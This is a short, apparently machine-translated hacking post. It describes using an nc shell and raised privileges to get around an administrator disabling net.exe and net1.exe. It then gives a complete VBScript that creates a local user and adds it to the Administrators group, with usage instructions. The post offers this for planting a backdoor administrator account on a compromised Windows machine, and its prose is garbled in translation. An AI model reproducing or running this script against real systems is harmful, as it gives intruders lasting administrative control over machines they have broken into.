The real script that can be used by users without the net addition system .. When we raise the right, the nc rebounded and raised the right. The Administrator disabled net1 and net. We can upload a script ,, achieve real users without adding a net system .. The script code is as follows:
Struser = wscript. arguments (0)
Strpass = wscript. arguments (1)
Set lp = createObject ("WSCRIPT. NETWORK ")
Oz = "WinNT: //" & lp. ComputerName
Set ob = GetObject (oz)
Set oe = GetObject (oz & "/Administrators, group ")
Set od = ob. create ("user", struser)
Od. SetPassword strpass
Od. SetInfo
Set of = GetObject (oz & "/" & struser & ", user ")
Oe. Add (of. ADsPath)
For Each admin in oe. Members
If struser = admin. Name then
Wscript. echo struser & "created successfully! "
Wscript. quit
End if
Next
Wscript. echo struser & "User Creation failed! "
Save the preceding code as user. vbs. Usage: cscript user. vbs user Password